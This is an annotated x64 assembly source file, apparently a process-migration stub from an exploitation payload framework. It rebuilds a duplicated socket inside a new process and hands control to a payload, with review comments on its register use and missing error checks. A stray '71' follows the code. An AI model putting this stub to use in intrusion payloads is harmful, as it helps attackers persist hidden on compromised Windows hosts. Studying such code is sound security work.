;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, 2003, XP
; Architecture: x64
; Version: 1.0 (Jan 2010)
; Size: 314 bytes
; Build: >build.py migrate
;-----------------------------------------------------------------------------;
; Migration stub. It is entered with RCX pointing at a MIGRATECONTEXT (layout
; below). It loads ws2_32, initialises Winsock, creates a socket in this process
; from the WSAPROTOCOL_INFO carried in the context, signals the context's event
; and then calls the payload pointer from the context with the socket in RDI.
;
; Every Win32 API is reached through the hash-based resolver in
; ./src/block/block_api.asm: r10d = hash of (module, export), then `call rbp`
; where rbp holds the address of api_call. The hash values below are taken
; from that scheme and must stay in sync with it.
;
; Register roles (all of these are callee-saved under the Microsoft x64 ABI,
; so they survive the API calls made through api_call):
;   rsi = pointer to the MIGRATECONTEXT handed to us in RCX
;   rbp = address of api_call (recovered from the `call start` return address)
;   r13 = pointer to the WSAData buffer carved out of the stack
;   r14 = the packed "ws2_32" module name
;   rdi = the socket returned by WSASocketA, left in place for the payload
;
; NOTE(review): no return value is checked anywhere in this stub. If
; LoadLibraryA, WSAStartup or WSASocketA fails, the event is still signalled
; and the payload is still called, with rdi holding INVALID_SOCKET in the last
; case. There is no error path back to whoever started this thread.
; NOTE(review): the WSAPROTOCOL_INFO at context offset 16 must describe a
; socket that was duplicated into this process beforehand (presumably via
; WSADuplicateSocket in the originating process) -- that step is not in this
; file and is what the whole stub depends on.
;
; Layout of the context, as addressed by the code below
; ([rsi] = hEvent, [rsi+8] = lpPayload, [rsi+16] = info):
;
; typedef struct MigrateContext
; {
; union
; {
; HANDLE hEvent;             ; offset 0  -- passed to SetEvent
; BYTE bPadding1[8];
; } e;
; union
; {
; LPVOID lpPayload;          ; offset 8  -- called last, never returned from here
; BYTE bPadding2[8];
; } p;
; WSAPROTOCOL_INFO info;     ; offset 16 -- lpProtocolInfo for WSASocketA
; } MIGRATECONTEXT, * LPMIGRATECONTEXT;

[BITS 64]
[ORG 0]

cld ; Clear the direction flag.
mov rsi, rcx ; RCX is a pointer to our migration stub context; keep it in callee-saved RSI so it survives the API calls below
sub rsp, 0x2000 ; Alloc some space on stack: 8 KiB of scratch below the caller's frame for the string, WSAData and call frames.
                ; NOTE(review): whether api_call reclaims the shadow space it reserves per call is defined in block_api.asm,
                ; not here; if it does not, this pad is what absorbs the downward creep of RSP over the four calls.
and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned (the Microsoft x64 ABI requires this at every call site)
call start ; Call start, this pushes the address of 'api_call' onto the stack.
delta: ; api_call is the first thing in the included file, so the pushed return address == &api_call
%include "./src/block/block_api.asm"
start: ;
pop rbp ; Pop off the address of 'api_call' for calling later. RSP is back to 16-byte alignment here.
; setup the structures we need on the stack...
mov r14, 'ws2_32' ; NASM packs the 6-char string into the 8-byte immediate, zero padded, giving a NUL-terminated string
push r14 ; Push the bytes 'ws2_32',0,0 onto the stack. (RSP is now 8 mod 16)
mov rcx, rsp ; save pointer to the "ws2_32" string for LoadLibraryA call.
sub rsp, 408+8 ; alloc sizeof( struct WSAData ) bytes for the WSAData structure (+8 for alignment); 416 is a multiple of 16 so RSP stays 8 mod 16
mov r13, rsp ; save pointer to the WSAData structure for WSAStartup call.
sub rsp, 0x28 ; alloc space for function calls; 8 + 416 + 40 == 464 == 29*16, so RSP is 16-byte aligned at the `call rbp` below
; perform the call to LoadLibraryA...
mov r10d, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call rbp ; LoadLibraryA( "ws2_32" )
         ; NOTE(review): the returned HMODULE (NULL on failure) is discarded; a failure here makes the two ws2_32 hashes below unresolvable
; perform the call to WSAStartup...
mov rdx, r13 ; second param is a pointer to this stuct
push byte 2 ;
pop rcx ; set the param for the version requested (wVersionRequested == 0x0002, i.e. Winsock 2.0)
mov r10d, 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
call rbp ; WSAStartup( 2, &WSAData );
         ; NOTE(review): a non-zero (error) return is ignored
; perform the call to WSASocketA...
xor r8, r8 ; we do not specify a protocol
push r8 ; push zero for the flags param.
push r8 ; push null for reserved parameter
        ; The 5th and 6th arguments travel on the stack; both are zero so their order is irrelevant,
        ; and the two pushes (16 bytes) keep RSP 16-byte aligned for the call.
lea r9, [rsi+16] ; We specify the WSAPROTOCOL_INFO structure from the MigrateContext (offset 16 == info)
push byte 1 ;
pop rdx ; SOCK_STREAM == 1
push byte 2 ;
pop rcx ; AF_INET == 2
mov r10d, 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call rbp ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 );
mov rdi, rax ; save the socket for later: RDI is callee-saved, so SetEvent will not clobber it and the payload is entered with it still in RDI
             ; NOTE(review): INVALID_SOCKET (all ones) on failure is not checked and is passed straight through to the payload
; perform the call to SetEvent...
mov rcx, qword [rsi] ; Set the first parameter to the migrate event (context offset 0 == hEvent)
mov r10d, 0x35269F1D ; hash( "kernel32.dll", "SetEvent" )
call rbp ; SetEvent( hEvent ); -- presumably tells the originating side that migration has reached this point (its meaning is defined by the caller, not here)
; perform the call to the payload...
call qword [rsi+8] ; Call the payload... (context offset 8 == lpPayload), entered with RDI == socket and RSP 16-byte aligned before the call
                   ; NOTE(review): nothing follows this call. If the payload ever returns, execution runs off the end of the
                   ; stub into whatever bytes happen to follow it in memory; the payload is expected never to return.
71